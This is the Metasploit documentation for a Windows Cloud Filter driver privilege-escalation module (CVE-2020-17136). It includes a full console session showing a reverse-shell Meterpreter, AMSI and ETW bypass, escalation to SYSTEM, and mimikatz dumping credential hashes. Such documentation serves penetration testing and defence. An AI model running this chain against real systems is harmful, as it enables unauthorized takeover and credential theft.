CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/cve_2020_17136.md
Views: 11789

Vulnerable Application

The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK and OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's getsystem command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.

Installation And Setup

cldflt.sys should exist by default on all versions of Windows 10 v1803 and later.

Verification Steps

  1. Start msfconsole

  2. Get a shell as a low privileged user.

  3. Verify that getsystem does not get you a SYSTEM shell.

  4. use exploit/windows/local/cve_2020_17136

  5. set session *session id*

  6. run

  7. Verify that you get a new shell as the N user

Options

AMSIBYPASS

Enable or disable ASMI bypass.

ETWBYPASS

Enable or disable ETW bypass.

WAIT

Time in seconds to wait before starting to read the text output from the injected C# exe.

Scenarios

Windows 10 2004 x64 - Build 19041.630 with cldflt.sys version 10.0.19041.488

msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600

meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > show options

Module options (exploit/windows/local/cve_2020_17136):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AMSIBYPASS  true             yes       Enable Amsi bypass
   ETWBYPASS   true             yes       Enable Etw bypass
   SESSION     1                yes       The session to run this module on.
   WAIT        5                no        Time in seconds to wait


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
LHOST => 172.22.159.28
msf6 exploit(windows/local/cve_2020_17136) > run

[*] Started reverse TCP handler on 172.22.159.28:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 100 launched.
[*] Reflectively injecting the Host DLL into 100..
[*] Injecting Host into 100...
[*] Host injected. Copy assembly into 100...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2733760425760
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
normal    DESKTOP-KUO5CML  a38673ad58b19421e952fc317b62c3c4  ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test      DESKTOP-KUO5CML  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-KUO5CML$  WORKGROUP        (null)
normal            DESKTOP-KUO5CML  (null)
test              DESKTOP-KUO5CML  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-kuo5cml$  WORKGROUP        (null)
normal            DESKTOP-KUO5CML  (null)
test              DESKTOP-KUO5CML  (null)


meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2020_17136) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML  0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)

msf6 exploit(windows/local/cve_2020_17136) >